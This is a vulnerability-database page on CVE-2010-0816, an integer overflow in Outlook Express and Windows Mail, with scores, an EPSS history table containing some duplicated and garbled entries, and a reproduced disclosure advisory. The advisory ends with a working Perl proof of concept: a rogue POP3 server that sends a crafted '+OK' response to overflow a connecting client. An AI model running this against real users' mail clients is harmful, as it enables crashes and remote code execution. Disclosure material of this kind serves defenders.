CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Services & Price
Help & Info
Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
Integer overflow in inetcomm.dll in Microsoft Outlook Express 5.5 SP2, 6, and 6 SP1; Windows Live Mail on Windows XP SP2 and SP3, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7; and Windows Mail on Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows remote e-mail servers and man-in-the-middle attackers to execute arbitrary code via a crafted (1) POP3 or (2) IMAP response, as demonstrated by a certain +OK response on TCP port 110, aka "Outlook Express and Windows Mail Integer Overflow Vulnerability."
Category : Numeric Errors Weaknesses in this category are related to improper calculation or conversion of numbers.
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
9.3
AV:N/AC:M/Au:N/C:C/I:C/A:C
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
50.36%
–
–
2022-04-03
–
–
50.36%
–
–
2022-09-18
–
–
48.37%
–
–
2023-02-05
–
–
44.7%
–
–
2023-03-12
–
–
–
96.15%
–
2023-04-09
–
–
–
96.4%
–
2023-05-28
–
–
–
96.19%
–
2023-07-16
–
–
–
96.41%
–
2023-08-27
–
–
–
96.13%
–
2024-02-18
–
–
–
95.76%
–
2024-06-02
–
–
–
95.76%
–
2024-09-29
–
–
–
95.31%
–
2024-11-10
–
–
–
94.73%
–
2024-12-22
–
–
–
91.17%
–
2025-02-02
–
–
–
89.52%
–
2025-01-19
–
–
–
91.17%
–
2025-02-02
–
–
–
89.52%
–
2025-03-18
–
–
–
–
55.45%
2025-03-18
–
–
–
–
55.45,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Publication date : 2010-05-10 22h00 +00:00 Author : Francis Provencher EDB Verified : Yes
Application: Microsoft Outlook Express
Microsoft Windows Mail
Platforms: Windows 2000
Windows XP
Windows Vista
Windows server 2003
Windows Server 2008 SR2
Exploitation: Remote Exploitable
CVE Number: CVE-2010-0816
Discover Date: 2009-09-11
Author: Francis Provencher (Protek Research Lab's)
Website: http://www.protekresearchlab.com
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) Products affected
5) The Code
#####################################################################################
=================
1) Introduction
=================
Windows Mail is an e-mail and newsgroup client included in Windows Vista, that was superseded by Windows Live Mail.
It is the successor to Outlook Express. Microsoft previewed Windows Mail on Channel 9 on October 10, 2005.[1]
Unlike Outlook Express, Windows Mail is not considered to be a component of Internet Explorer. As such, it will not
be made available for earlier Windows operating systems, while Windows Internet Explorer 7 was made available for
Windows XP.
Windows Mail has been succeeded by Windows Live Mail, which was built by the same development team as Windows Mail
and also serves as the replacement for Outlook Express for Windows XP.
(Wikipedia)
#####################################################################################
====================
2) Report Timeline
====================
2009-11-09 Vendor Contacted
2009-11-09 Vendor Response
2009-11-16 Vendor request a PoC
2009-11-16 PoC is send
2009-11-19 Vendor confirme they received PoC
2009-11-24 Vendor confirm the vulnerability
2010-05-11 Public release of this advisory
#####################################################################################
======================
3) Technical details
======================
An unauthenticated remote code execution vulnerability exists in the way that the Windows Mail Client software
handles specially crafted mail responses. An attempt to exploit the vulnerability would not require authentication,
allowing an attacker to exploit the vulnerability by sending a specially crafted response to a client initiating a
connection to a server under his control using the common mail protocols.
The vulnerability is caused by a common library used by Outlook Express and Windows Mail insufficiently validating
network data before using that data to calculate the necessary size of a buffer.
#####################################################################################
=====================
4) Product affected
=====================
Mail client; Microsoft Outlook Express & Microsoft Windows Mail
Plateforms; Vista SP1 & Windows Server 2008 SP1
#####################################################################################
=============
5) The Code
=============
#!/usr/bin/perl -w
# Found by Francis Provencher for Protek Research Lab's
# {PRL} Microsoft Windows Mail CLient & outlook express Remote Integer Overflow
#
use IO::Socket;
$port = 110;
$serv = IO::Socket::INET->new(Proto=>'tcp',
LocalPort=>$port,
Listen=>1)
or die "Error: listen($port)\n";
$cli = $serv->accept() or die "Error: accept()\n";
$cli->send("+OK\r\n");
$cli->recv($recvbuf, 512);
$cli->send("+OK\r\n");
$cli->recv($recvbuf, 512);
$cli->send("+OK\r\n");
$cli->recv($recvbuf, 512);
$cli->send("+OK 357913944 100\r\n");